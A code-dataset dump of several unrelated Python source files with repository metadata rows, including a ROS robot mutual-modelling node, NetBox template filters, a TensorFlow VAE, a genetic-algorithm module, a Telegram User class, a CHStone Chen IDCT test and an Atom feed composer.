visible_for_robot_from = {"tablet":["punishes","rewards","sends_demo"],"selection_tablet":["sends_new_word"], "child_head":["looks_tablet","looks_robot_head","looks_out","looks_experimentator"]}
# when an agent do/observe something the mutual models (by the robot) are updated:
#---------------------------------------------------------------------------------
models_percepts = {}
models_actions = {}
human_target = "_"
robot_target = "_"
last_info = ""
def onChangeRobotTarget(msg):
global robot_target
robot_target = str(msg.data)
def onChangeHumanTarget(msg):
global human_target
human_target = str(msg.data)
def onChangeHumanWMN(msg):
global last_info
delta_wmn = msg.data
if last_info!=str(delta_wmn):
models_percepts.setdefault(ROBOT_NAME,[]).append(("with_me",delta_wmn))
makeDecision()
last_info = str(delta_wmn)
def onRobotAction(msg):
global models_actions
global models_percepts
global last_info
action = str(msg.data)
if last_info!=action:
if human_target in visible_for_human_from:
if action in visible_for_human_from[human_target]:
models_actions[HUMAN_NAME+':'+ROBOT_NAME] = action
models_percepts.setdefault(HUMAN_NAME,[]).append((ROBOT_NAME+"_"+action,1.))
rospy.loginfo(ROBOT_NAME+"_"+action)
rospy.loginfo(".........................................")
makeDecision()
last_info=action
def onHumanAction(msg):
global models_actions
global models_percepts
global last_info
action = str(msg.data)
if last_info!=action:
models_actions[HUMAN_NAME] = action
models_percepts.setdefault(ROBOT_NAME,[]).append((HUMAN_NAME+'_'+action,1.))
rospy.loginfo(HUMAN_NAME+'_'+action)
rospy.loginfo("////////////////////////////////////////")
if robot_target in visible_for_robot_from:
if action in visible_for_robot_from[robot_target]:
models_percepts.setdefault(HUMAN_NAME+':'+ROBOT_NAME,[]).append((HUMAN_NAME+"_"+action,1.))
makeDecision()
last_info=action
def makeDecision():
global robot
global models_actions
global models_percepts
new_robot_action = None
if models_actions:
new_robot_action = robot.update_models(None,models_percepts,models_actions)
rospy.loginfo(models_percepts)
rospy.loginfo(models_actions)
#rospy.loginfo(test)
rospy.loginfo("----------------------------------------")
if new_robot_action:
msg = String()
msg.data = new_robot_action
pub_robot_action.publish(msg)
models_percepts = {}
models_actions = {}
rospy.sleep(1.0)
# TODO:
"""
def onRobotObs(msg):
def onHumanObs(msg):
"""
if __name__=='__main__':
rospy.init_node("cowriter_mutual_modelling")
while(True):
rospy.Subscriber('robot_action_topic', String, onRobotAction )
rospy.Subscriber('human_action_topic', String, onHumanAction)
rospy.Subscriber('robot_target_topic', String, onChangeRobotTarget)
rospy.Subscriber('human_target_topic', String, onChangeHumanTarget)
rospy.Subscriber('human_wmn_topic', Float64, onChangeHumanWMN)
#rospy.Subscriber('robot_obs_topic', String, onRobotObs)
#rospy.Subscriber('human_obs_topic', String, onHumanObs)
rospy.sleep(1.0)
rospy.spin()
| isc | 3,709,407,553,419,079,000 | 42.772059 | 448 | 0.624055 | false | 3.47519 | false | false | false |
rfdrake/netbox | netbox/utilities/templatetags/helpers.py | 1 | 2526 | from markdown import markdown
from django import template
from django.utils.safestring import mark_safe
register = template.Library()
#
# Filters
#
@register.filter()
def oneline(value):
"""
Replace each line break with a single space
"""
return value.replace('\n', ' ')
@register.filter()
def getlist(value, arg):
"""
Return all values of a QueryDict key
"""
return value.getlist(arg)
@register.filter(is_safe=True)
def gfm(value):
"""
Render text as GitHub-Flavored Markdown
"""
html = markdown(value, extensions=['mdx_gfm'])
return mark_safe(html)
@register.filter()
def startswith(value, arg):
"""
Test whether a string starts with the given argument
"""
return str(value).startswith(arg)
@register.filter()
def user_can_add(model, user):
perm_name = '{}:add_{}'.format(model._meta.app_label, model.__class__.__name__.lower())
return user.has_perm(perm_name)
@register.filter()
def user_can_change(model, user):
perm_name = '{}:change_{}'.format(model._meta.app_label, model.__class__.__name__.lower())
return user.has_perm(perm_name)
@register.filter()
def user_can_delete(model, user):
perm_name = '{}:delete_{}'.format(model._meta.app_label, model.__class__.__name__.lower())
return user.has_perm(perm_name)
#
# Tags
#
@register.simple_tag()
def querystring_toggle(request, multi=True, page_key='page', **kwargs):
"""
Add or remove a parameter in the HTTP GET query string
"""
new_querydict = request.GET.copy()
# Remove page number from querystring
try:
new_querydict.pop(page_key)
except KeyError:
pass
# Add/toggle parameters
for k, v in kwargs.items():
values = new_querydict.getlist(k)
if k in new_querydict and v in values:
values.remove(v)
new_querydict.setlist(k, values)
elif not multi:
new_querydict[k] = v
else:
new_querydict.update({k: v})
querystring = new_querydict.urlencode()
if querystring:
return '?' + querystring
else:
return ''
@register.inclusion_tag('utilities/templatetags/utilization_graph.html')
def utilization_graph(utilization, warning_threshold=75, danger_threshold=90):
"""
Display a horizontal bar graph indicating a percentage of utilization.
"""
return {
'utilization': utilization,
'warning_threshold': warning_threshold,
'danger_threshold': danger_threshold,
}
| apache-2.0 | 3,335,065,604,694,656,500 | 22.174312 | 94 | 0.638559 | false | 3.618911 | false | false | false |
brain-research/acai | vae.py | 1 | 5092 | # Copyright 2018 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#!/usr/bin/env python
"""Variational autoencoder.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import math
from absl import app
from absl import flags
import tensorflow as tf
from lib import data, layers, train, utils, classifiers
FLAGS = flags.FLAGS
class VAE(train.AE):
def model(self, latent, depth, scales, beta):
x = tf.placeholder(tf.float32,
[None, self.height, self.width, self.colors], 'x')
l = tf.placeholder(tf.float32, [None, self.nclass], 'label')
h = tf.placeholder(
tf.float32,
[None, self.height >> scales, self.width >> scales, latent], 'h')
def encoder(x):
return layers.encoder(x, scales, depth, latent, 'ae_enc')
def decoder(h):
return layers.decoder(h, scales, depth, self.colors, 'ae_dec')
encode = encoder(x)
with tf.variable_scope('ae_latent'):
encode_shape = tf.shape(encode)
encode_flat = tf.layers.flatten(encode)
latent_dim = encode_flat.get_shape()[-1]
q_mu = tf.layers.dense(encode_flat, latent_dim)
log_q_sigma_sq = tf.layers.dense(encode_flat, latent_dim)
q_sigma = tf.sqrt(tf.exp(log_q_sigma_sq))
q_z = tf.distributions.Normal(loc=q_mu, scale=q_sigma)
q_z_sample = q_z.sample()
q_z_sample_reshaped = tf.reshape(q_z_sample, encode_shape)
p_x_given_z_logits = decoder(q_z_sample_reshaped)
p_x_given_z = tf.distributions.Bernoulli(logits=p_x_given_z_logits)
ae = 2*tf.nn.sigmoid(p_x_given_z_logits) - 1
decode = 2*tf.nn.sigmoid(decoder(h)) - 1
loss_kl = 0.5*tf.reduce_sum(
-log_q_sigma_sq - 1 + tf.exp(log_q_sigma_sq) + q_mu**2)
loss_kl = loss_kl/tf.to_float(tf.shape(x)[0])
x_bernoulli = 0.5*(x + 1)
loss_ll = tf.reduce_sum(p_x_given_z.log_prob(x_bernoulli))
loss_ll = loss_ll/tf.to_float(tf.shape(x)[0])
elbo = loss_ll - beta*loss_kl
utils.HookReport.log_tensor(loss_kl, 'loss_kl')
utils.HookReport.log_tensor(loss_ll, 'loss_ll')
utils.HookReport.log_tensor(elbo, 'elbo')
xops = classifiers.single_layer_classifier(
tf.stop_gradient(encode), l, self.nclass)
xloss = tf.reduce_mean(xops.loss)
utils.HookReport.log_tensor(xloss, 'classify_latent')
update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)
ae_vars = tf.global_variables('ae_')
xl_vars = tf.global_variables('single_layer_classifier')
with tf.control_dependencies(update_ops):
train_ae = tf.train.AdamOptimizer(FLAGS.lr).minimize(
-elbo, var_list=ae_vars)
train_xl = tf.train.AdamOptimizer(FLAGS.lr).minimize(
xloss, tf.train.get_global_step(), var_list=xl_vars)
ops = train.AEOps(x, h, l, q_z_sample_reshaped, decode, ae,
tf.group(train_ae, train_xl),
classify_latent=xops.output)
n_interpolations = 16
n_images_per_interpolation = 16
def gen_images():
return self.make_sample_grid_and_save(
ops, interpolation=n_interpolations,
height=n_images_per_interpolation)
recon, inter, slerp, samples = tf.py_func(
gen_images, [], [tf.float32]*4)
tf.summary.image('reconstruction', tf.expand_dims(recon, 0))
tf.summary.image('interpolation', tf.expand_dims(inter, 0))
tf.summary.image('slerp', tf.expand_dims(slerp, 0))
tf.summary.image('samples', tf.expand_dims(samples, 0))
return ops
def main(argv):
del argv # Unused.
batch = FLAGS.batch
dataset = data.get_dataset(FLAGS.dataset, dict(batch_size=batch))
scales = int(round(math.log(dataset.width // FLAGS.latent_width, 2)))
model = VAE(
dataset,
FLAGS.train_dir,
latent=FLAGS.latent,
depth=FLAGS.depth,
scales=scales,
beta=FLAGS.beta)
model.train()
if __name__ == '__main__':
flags.DEFINE_integer('depth', 64, 'Depth of first for convolution.')
flags.DEFINE_integer(
'latent', 16,
'Latent space depth, the total latent size is the depth multiplied by '
'latent_width ** 2.')
flags.DEFINE_integer('latent_width', 4, 'Width of the latent space.')
flags.DEFINE_float('beta', 1.0, 'ELBO KL term scale.')
app.run(main)
| apache-2.0 | -914,411,565,567,096,600 | 36.718519 | 79 | 0.616261 | false | 3.347798 | false | false | false |
bluemini/agenetic | ga.py | 1 | 14226 | #!/usr/bin/env python
# Copyright (c) 2012, Nick Harvey
# All rights reserved.
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# - Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
# - Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# - Neither the name of the <ORGANIZATION> nor the names of its contributors
# may be used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
import Matrix, random, copy, sys
class ga:
def __init__(self):
self.population = []
self.coeff_size = 0
def seedGA(self, size, inSize, hiddenSize, outSize):
'Creates a new set of matrices for the neural network'
self.size = size
self.inSize = inSize
self.hiddenSize = hiddenSize
self.outSize = outSize
self.coeff_size = (inSize * hiddenSize) + hiddenSize + (hiddenSize * outSize) + outSize
for i in range(size):
matrices = {}
matrices["first_weights"] = self.getWeights(inSize, hiddenSize)
matrices["first_thresholds"] = self.getThresholds(hiddenSize)
matrices["second_weights"] = self.getWeights(hiddenSize, outSize)
matrices["second_thresholds"] = self.getThresholds(outSize)
self.population.append(matrices)
def getInputSize(self):
return self.inSize
def getHiddenSize(self):
return self.hiddenSize
def getOutputSize(self):
return self.outSize
def setGA2(self, population):
self.population = population
self.size = len(self.population)
def setGA(self, population):
self.population = population
self.size = len(self.population)
temp = population[0]
self.inSize = temp["first_weights"].getWidth()
self.hiddenSize = temp["first_thresholds"].getHeight()
self.outSize = temp["second_weights"].getHeight()
self.coeff_size = (self.inSize * self.hiddenSize) + self.hiddenSize + (self.hiddenSize * self.outSize) + self.outSize
def getWeights(self, width, height):
m = Matrix.Matrix()
m.setWidth(width)
m.setHeight(height)
m.randomFill(0, 1)
return m
def getThresholds(self, height):
m = Matrix.Matrix()
m.setHeight(height)
m.randomFill(0, 2)
return m
def getPopulation(self):
return self.population
def mateParents(self, firstParentId, secondParentId, intest=False):
'''Takes the ids of two chromozones, picks a crossover point and then
takes the first part of chromozone one, before the crossover location
and joins it with the second part of chromozone two, after the crossover
location. It then does the opposite with the first part of chromozone two
and the second part of chromozone one.'''
parent1 = self.population[firstParentId]
parent2 = self.population[secondParentId]
selector = int(random.random() * self.coeff_size)
children = [parent1.copy(), parent2.copy()]
crossover_index = 0
if intest:
print("Mating parents:", selector)
# print("selector:", selector, self.coeff_size)
if selector < (self.inSize * self.hiddenSize):
selector_row = int(selector/self.inSize)
selector_col = selector % self.inSize
crossover_loc = "first_weights"
crossover_index = 0
# print("Crossing first weights", selector, selector_row, selector_col)
else:
# child["first_weights"] = parent1["first_weights"].copy()
selector = selector - (self.inSize * self.hiddenSize)
if selector < self.hiddenSize:
selector_row = selector
selector_col = 0
crossover_loc = "first_thresholds"
crossover_index = 1
# print("Crossing first thresholds", selector, selector_row, selector_col)
else:
# child["first_thresholds"] = parent1["first_thresholds"].copy()
selector = selector - (self.hiddenSize)
if selector < (self.hiddenSize * self.outSize):
selector_row = int(selector/self.hiddenSize)
selector_col = selector % self.hiddenSize
crossover_loc = "second_weights"
crossover_index = 2
# print("Crossing second weights", selector, selector_row, selector_col)
else:
# child["second_weights"] = parent1["second_weights"].copy()
selector = selector - (self.hiddenSize * self.outSize)
selector_row = selector
selector_col = 0
crossover_loc = "second_thresholds"
crossover_index = 3
# print("Crossing second thresholds", selector, selector_row, selector_col)
if intest:
print("Crossover location:", crossover_loc)
children[0][crossover_loc] = self.crossOver(parent1[crossover_loc], parent2[crossover_loc], selector_row, selector_col)
children[1][crossover_loc] = self.crossOver(parent2[crossover_loc], parent1[crossover_loc], selector_row, selector_col)
## then merge the remaining matrices into the new chromozone
if crossover_index < 1:
children[0]['first_thresholds'] = copy.deepcopy(parent2['first_thresholds'])
children[1]['first_thresholds'] = copy.deepcopy(parent1['first_thresholds'])
if crossover_index < 2:
children[0]['second_weights'] = copy.deepcopy(parent2['second_weights'])
children[1]['second_weights'] = copy.deepcopy(parent1['second_weights'])
if crossover_index < 3:
children[0]['second_thresholds'] = copy.deepcopy(parent2['second_thresholds'])
children[1]['second_thresholds'] = copy.deepcopy(parent1['second_thresholds'])
return children
def crossOver(self, parent_one, parent_two, row, col, intest=False):
"""crossover determines which chromozones progress to the next population"""
rows = parent_one.getHeight()
cols = parent_one.getWidth()
cross = row*rows + col
m = Matrix.Matrix().setWidth(cols).setHeight(rows).init()
for i in range(rows):
for j in range(cols):
if (i*rows+j) < cross:
m.setElem(i, j, parent_one.getElem(i, j))
else:
m.setElem(i, j, parent_two.getElem(i, j))
return m
def mutatePopulation(self, survivors, mutationRate, crossOver):
'''Mutates a population of chromozones.
There are number of approaches to achieving this. This approach uses a primary
random number in the range (0..3) to select which of the 4 matrices in the ANN
to mutate. Once it has picked which one, it uses a second random number in the
range (0..number_of_elements) to choose which value to change.
This is simplistic, in comparison with another algorithm, which biases the
probability by the size of the matrix. This approach causes mutations on the
smaller matrices much more frequently.'''
newPopulation = []
mutations = [0 for i in range(4)]
for matrices in survivors:
# matrices = self.population[s]
if random.random() < mutationRate:
matrixToMutate = int(random.random() * 4)
print("Mutating", str(matrixToMutate))
# selector refers to the first weights matrix ([ INPUT x HIDDEN ])
if matrixToMutate == 0:
selector_col = int(random.random() * self.inSize)
selector_row = int(random.random() * self.hiddenSize)
matrices["first_weights"].setElem(selector_row, selector_col, random.random())
mutations[0] += 1
# selector refers to the first thresholds matrix
elif matrixToMutate == 1:
selector = int(random.random() * self.hiddenSize)
currVal = matrices["first_thresholds"].getElem(selector, 0)
currVal += (0.1 - random.random()*0.2)
if currVal > 2:
currVal = 2
elif currVal < 0:
currVal = 0
matrices["first_thresholds"].setElem(selector, 0, currVal)
mutations[1] += 1
# print("Mutation in first threshold", selector)
# selector refers to the second weights matrix ([ HIDDEN x OUTPUT ])
elif matrixToMutate == 2:
selector_col = int(random.random() * self.hiddenSize)
selector_row = int(random.random() * self.outSize)
matrices["second_weights"].setElem(selector_row, selector_col, random.random())
mutations[2] += 1
# print("Mutation in second matrix", selector, selector_row, selector_col)
# selector refers to the second thresholds
elif matrixToMutate == 3:
selector = int(random.random() * self.outSize)
currVal = matrices["second_thresholds"].getElem(selector, 0)
currVal += (0.1 - random.random()*0.2)
if currVal > 2:
currVal = 2
elif currVal < 0:
currVal = 0
matrices["second_thresholds"].setElem(selector, 0, currVal)
mutations[3] += 1
#print("Mutation in second threshold")
else:
print("Unknown index for the matrix to mutate:", matrixToMutate)
newPopulation.append(matrices)
self.population = newPopulation
return mutations
def mutatePopulationSingle(self, survivors, mutationRate, crossOver):
newPopulation = []
mutations = [0 for i in range(4)]
for matrices in survivors:
# matrices = self.population[s]
if random.random() < mutationRate:
selector = int(random.random() * self.coeff_size)
# selector refers to the first weights matrix
if selector < (self.inSize * self.hiddenSize):
selector_row = int(selector/self.inSize)
selector_col = selector % self.inSize
try:
matrices["first_weights"].setElem(selector_row, selector_col, random.random())
except:
print("Selector: ", selector)
print("Width: ", matrices["first_weights"].getWidth(), self.inSize, len(matrices["first_weights"].getData()[0]))
print("Height: ", matrices["first_weights"].getHeight(), self.hiddenSize, len(matrices["first_weights"].getData()))
print("Problems with setElem...")
print(selector_row, selector_col)
sys.exit()
# print("Mutation in first matrix", selector, selector_row, selector_col)
mutations[0] += 1
else:
selector = selector - (self.inSize * self.hiddenSize)
# selector refers to the first thresholds matrix
if selector < self.hiddenSize:
currVal = matrices["first_thresholds"].getElem(selector, 0)
currVal += (0.1 - random.random()*0.2)
if currVal > 2:
currVal = 2
elif currVal < 0:
currVal = 0
matrices["first_thresholds"].setElem(selector, 0, currVal)
mutations[1] += 1
# print("Mutation in first threshold", selector)
pass
else:
selector = selector - (self.hiddenSize)
# selector refers to the second weights matrix
if selector < (self.hiddenSize * self.outSize):
selector_row = int(selector/self.outSize)
selector_col = selector % self.outSize
matrices["second_weights"].setElem(selector_row, selector_col, random.random())
mutations[2] += 1
# print("Mutation in second matrix", selector, selector_row, selector_col)
# selector refers to the second thresholds
else:
selector = selector - (self.hiddenSize * self.outSize)
currVal = matrices["second_thresholds"].getElem(selector, 0)
currVal += (0.1 - random.random()*0.2)
if currVal > 2:
currVal = 2
elif currVal < 0:
currVal = 0
matrices["second_thresholds"].setElem(selector, 0, currVal)
mutations[3] += 1
#print("Mutation in second threshold")
newPopulation.append(matrices)
self.population = newPopulation
return mutations
def roulette(self, scores, intest=False):
nextGen = []
selector = int(random.random() * self.size)
selectors = []
beta = 0.0
mw = max(scores)
roul = roulette(scores)
for n in range(self.size):
pair = []
## no breeding, just fittest lives
if intest:
pair = [0, 1]
print("Testing crossover,", pair)
## breed the pair
nextGen.extend(self.mateParents(pair[0], pair[1], intest))
# purely for testing
if True:
for i in range(2):
pair.append(roul.getNext())
## breed the pair
nextGen.extend(self.mateParents(pair[0], pair[1]))
# just random roulette wheel picker and append to next gen..
else:
nextGen.append(copy.deepcopy(self.population[roul.getNext()]))
# print("Selected: ", selector)
selectors.append(selector)
# if we've grown the next generation to the maxpop size, then finish
if len(nextGen) >= self.size:
break
# print(selectors)
return nextGen
# return self.population
def validate(self):
"Verifies that the sizes of the internal ANN matrices match those of the settings"
valid = True
for p in self.population:
valid = valid and (p["first_weights"].getWidth() == self.inSize)
valid = valid and (p["first_weights"].getHeight() == self.hiddenSize)
valid = valid and (p["first_thresholds"].getWidth() == 1)
valid = valid and (p["first_thresholds"].getHeight() == self.hiddenSize)
return valid
class roulette:
def __init__(self, counts):
self.data = counts
self.mw = sum(self.data)
self.size = len(self.data)
self.beta = 0
self.selector = 0
def getNext(self):
self.beta += (random.random() * self.mw * 2.0)
while (self.beta > self.data[self.selector]):
self.beta -= self.data[self.selector]
self.selector = (self.selector + 1) % self.size
return self.selector
| bsd-3-clause | 4,133,773,500,725,697,000 | 36.448649 | 121 | 0.675524 | false | 3.490186 | true | false | false |
urban48/python-telegram-bot | telegram/user.py | 6 | 1109 | #!/usr/bin/env python
from telegram import TelegramObject
class User(TelegramObject):
def __init__(self,
id,
first_name,
last_name=None,
username=None):
self.id = id
self.first_name = first_name
self.last_name = last_name
self.username = username
@property
def name(self):
if self.username:
return '@%s' % self.username
if self.last_name:
return '%s %s' % (self.first_name, self.last_name)
return self.first_name
@staticmethod
def de_json(data):
return User(id=data.get('id', None),
first_name=data.get('first_name', None),
last_name=data.get('last_name', None),
username=data.get('username', None))
def to_dict(self):
data = {'id': self.id,
'first_name': self.first_name}
if self.last_name:
data['last_name'] = self.last_name
if self.username:
data['username'] = self.username
return data
| gpl-2.0 | -6,433,096,805,626,666,000 | 26.725 | 62 | 0.513977 | false | 3.946619 | false | false | false |
ktok07b6/polyphony | tests/chstone/jpeg/chenidct.py | 1 | 7203 | from polyphony import testbench
'''
+--------------------------------------------------------------------------+
| CHStone : A suite of Benchmark Programs for C-based High-Level Synthesis |
| ======================================================================== |
| |
| * Collected and Modified : Y. Hara, H. Tomiyama, S. Honda, |
| H. Takada and K. Ishii |
| Nagoya University, Japan |
| |
| * Remarks : |
| 1. This source code is reformatted to follow CHStone's style. |
| 2. Test vectors are added for CHStone. |
| 3. If "main_result" is 0 at the end of the program, the program is |
| successfully executed. |
| 4. Follow the copyright of each benchmark program. |
+--------------------------------------------------------------------------+
/*
* IDCT transformation of Chen algorithm
*
* @(#) $Id: chenidct.c,v 1.2 2003/07/18 10:19:21 honda Exp $
*/
/*************************************************************
Copyright (C) 1990, 1991, 1993 Andy C. Hung, all rights reserved.
PUBLIC DOMAIN LICENSE: Stanford University Portable Video Research
Group. If you use this software, you agree to the following: This
program package is purely experimental, and is licensed "as is".
Permission is granted to use, modify, and distribute this program
without charge for any purpose, provided this license/ disclaimer
notice appears in the copies. No warranty or maintenance is given,
either expressed or implied. In no event shall the author(s) be
liable to you or a third party for any special, incidental,
consequential, or other damages, arising out of the use or inability
to use the program for any purpose (or the loss of data), even if we
have been advised of such possibilities. Any public reference or
advertisement of this source code should refer to it as the Portable
Video Research Group (PVRG) code, and not by any author(s) (or
Stanford University) name.
*************************************************************/
/*
************************************************************
chendct.c
A simple DCT algorithm that seems to have fairly nice arithmetic
properties.
W. H. Chen, C. H. Smith and S. C. Fralick "A fast computational
algorithm for the discrete cosine transform," IEEE Trans. Commun.,
vol. COM-25, pp. 1004-1009, Sept 1977.
************************************************************
'''
# Cos constants
c1d4 = 362
c1d8 = 473
c3d8 = 196
c1d16 = 502
c3d16 = 426
c5d16 = 284
c7d16 = 100
'''
/*
*
* ChenIDCT() implements the Chen inverse dct. Note that there are two
* input vectors that represent x=input, and y=output, and must be
* defined (and storage allocated) before this routine is called.
*/
'''
def ChenIDct(x:list, y:list):
def LS(r,s):
return r << s
def RS(r,s):
return r >> s # Caution with rounding...
def MSCALE(expr):
return RS(expr, 9)
# Loop over columns
for i in range(8):
b0 = LS(x[i + 0], 2)
a0 = LS(x[i + 8], 2)
b2 = LS(x[i + 16], 2)
a1 = LS(x[i + 24], 2)
b1 = LS(x[i + 32], 2)
a2 = LS(x[i + 40], 2)
b3 = LS(x[i + 48], 2)
a3 = LS(x[i + 56], 2)
# Split into even mode b0 = x0 b1 = x4 b2 = x2 b3 = x6.
# And the odd terms a0 = x1 a1 = x3 a2 = x5 a3 = x7.
c0 = MSCALE((c7d16 * a0) - (c1d16 * a3))
c1 = MSCALE((c3d16 * a2) - (c5d16 * a1))
c2 = MSCALE((c3d16 * a1) + (c5d16 * a2))
c3 = MSCALE((c1d16 * a0) + (c7d16 * a3))
# First Butterfly on even terms.
a0 = MSCALE(c1d4 * (b0 + b1))
a1 = MSCALE(c1d4 * (b0 - b1))
a2 = MSCALE((c3d8 * b2) - (c1d8 * b3))
a3 = MSCALE((c1d8 * b2) + (c3d8 * b3))
b0 = a0 + a3
b1 = a1 + a2
b2 = a1 - a2
b3 = a0 - a3
# Second Butterfly
a0 = c0 + c1
a1 = c0 - c1
a2 = c3 - c2
a3 = c3 + c2
c0 = a0
c1 = MSCALE(c1d4 * (a2 - a1))
c2 = MSCALE(c1d4 * (a2 + a1))
c3 = a3
y[i + 0] = b0 + c3
y[i + 8] = b1 + c2
y[i + 16] = b2 + c1
y[i + 24] = b3 + c0
y[i + 32] = b3 - c0
y[i + 40] = b2 - c1
y[i + 48] = b1 - c2
y[i + 56] = b0 - c3
# Loop over rows
for i in range(8):
idx = LS(i, 3)
b0 = y[idx+0]
a0 = y[idx+1]
b2 = y[idx+2]
a1 = y[idx+3]
b1 = y[idx+4]
a2 = y[idx+5]
b3 = y[idx+6]
a3 = y[idx+7]
# Split into even mode b0 = x0 b1 = x4 b2 = x2 b3 = x6.
# And the odd terms a0 = x1 a1 = x3 a2 = x5 a3 = x7.
c0 = MSCALE((c7d16 * a0) - (c1d16 * a3))
c1 = MSCALE((c3d16 * a2) - (c5d16 * a1))
c2 = MSCALE((c3d16 * a1) + (c5d16 * a2))
c3 = MSCALE((c1d16 * a0) + (c7d16 * a3))
# First Butterfly on even terms.
a0 = MSCALE(c1d4 * (b0 + b1))
a1 = MSCALE(c1d4 * (b0 - b1))
a2 = MSCALE((c3d8 * b2) - (c1d8 * b3))
a3 = MSCALE((c1d8 * b2) + (c3d8 * b3))
# Calculate last set of b's
b0 = a0 + a3
b1 = a1 + a2
b2 = a1 - a2
b3 = a0 - a3
# Second Butterfly
a0 = c0 + c1
a1 = c0 - c1
a2 = c3 - c2
a3 = c3 + c2
c0 = a0
c1 = MSCALE(c1d4 * (a2 - a1))
c2 = MSCALE(c1d4 * (a2 + a1))
c3 = a3
idx = LS(i, 3)
y[idx+0] = b0 + c3
y[idx+1] = b1 + c2
y[idx+2] = b2 + c1
y[idx+3] = b3 + c0
y[idx+4] = b3 - c0
y[idx+5] = b2 - c1
y[idx+6] = b1 - c2
y[idx+7] = b0 - c3
# Retrieve correct accuracy. We have additional factor
# of 16 that must be removed.
for i in range(64):
v = y[i]
if v < 0:
y[i] = (v - 8)>>4
else:
y[i] = (v + 8)>>4
return 0
@testbench
def test():
ins = [
154, 192, 254, 239, 180, 128, 123, 110,
123, 180, 198, 180, 154, 136, 105, 136,
123, 136, 154, 136, 136, 123, 110, 123,
123, 154, 154, 180, 167, 136, 149, 123,
123, 154, 180, 180, 166, 154, 136, 123,
123, 154, 154, 166, 149, 180, 136, 136,
123, 136, 123, 123, 136, 198, 180, 154,
136, 110, 123, 123, 136, 154, 166, 136
]
outs = [None] * 64
expected = [
1077, -250, 114, -109, 76, -27, 56, 12,
-232, 156, -106, -16, -13, -9, -25, 8,
236, -74, 62, -20, 5, -4, 31, 6,
16, 48, -68, -18, -18, -7, 1, -16,
163, -30, -7, -25, 16, 23, -9, 22,
29, -9, -4, -4, -4, 13, -13, -8,
81, -2, -12, -10, 12, 15, 5, 11,
37, 3, -4, -7, -6, 6, 7, 18
]
ChenIDct(ins, outs)
for i in range(64):
print(outs[i])
assert outs[i] == expected[i]
test()
| mit | -2,255,885,441,398,530,600 | 30.871681 | 76 | 0.451617 | false | 2.848161 | false | false | false |
mblayman/handroll | handroll/composers/atom.py | 1 | 3542 | # Copyright (c) 2014, Matt Layman
from datetime import datetime
import io
import json
import os
import time
from werkzeug.contrib.atom import AtomFeed
from werkzeug.contrib.atom import FeedEntry
from handroll import logger
from handroll.composers import Composer
from handroll.exceptions import AbortError
from handroll.i18n import _
class AtomComposer(Composer):
"""Compose an Atom feed from an Atom metadata file (``.atom``).
The ``AtomComposer`` parses the metadata specified in the source file and
produces an XML Atom feed. ``AtomComposer`` uses parameters that are needed
by Werkzeug's ``AtomFeed`` API. Refer to the `Werkzeug documentation
<http://werkzeug.pocoo.org/docs/contrib/atom/>`_ for all the available
options.
The dates in the feed should be in `RfC 3339
<http://www.ietf.org/rfc/rfc3339.txt>`_ format (e.g.,
``2014-06-13T11:39:30``).
Here is a sample feed:
.. literalinclude:: ../sample/atom_sample.atom
"""
def compose(self, catalog, source_file, out_dir):
root, ext = os.path.splitext(os.path.basename(source_file))
filename = root + '.xml'
output_file = os.path.join(out_dir, filename)
if self._needs_update(source_file, output_file):
logger.info(_('Generating Atom XML for {source_file} ...').format(
source_file=source_file))
feed = self._parse_feed(source_file)
with open(output_file, 'wb') as out:
out.write(feed.to_string().encode('utf-8'))
out.write(b'<!-- handrolled for excellence -->\n')
else:
logger.debug(_('Skipping {filename} ... It is up to date.').format(
filename=filename))
def _needs_update(self, source_file, out_file):
"""Check if the output file needs to be updated by looking at the
modified times of the source file and output file."""
if os.path.exists(out_file):
return os.path.getmtime(source_file) > os.path.getmtime(out_file)
else:
# The file doesn't exist so it definitely needs to be "updated."
return True
def _parse_feed(self, source_file):
try:
with io.open(source_file, 'r', encoding='utf-8') as f:
metadata = json.loads(f.read())
if metadata.get('entries') is None:
raise ValueError(_('Missing entries list.'))
entries = metadata['entries']
# AtomFeed expects FeedEntry objects for the entries keyword so
# remove it from the metadata and add it after the feed is built.
del metadata['entries']
feed = AtomFeed(**metadata)
[feed.add(self._make_entry(entry)) for entry in entries]
except ValueError as error:
raise AbortError(_('Invalid feed {source_file}: {error}').format(
source_file=source_file, error=str(error)))
return feed
def _make_entry(self, data):
# Convert dates into datetime instances.
if 'updated' in data:
data['updated'] = self._convert_date(data['updated'])
if 'published' in data:
data['published'] = self._convert_date(data['published'])
return FeedEntry(**data)
def _convert_date(self, date):
"""Convert a date string into a datetime instance. Assumes date string
is RfC 3389 format."""
time_s = time.strptime(date, '%Y-%m-%dT%H:%M:%S')
return datetime.fromtimestamp(time.mktime(time_s))
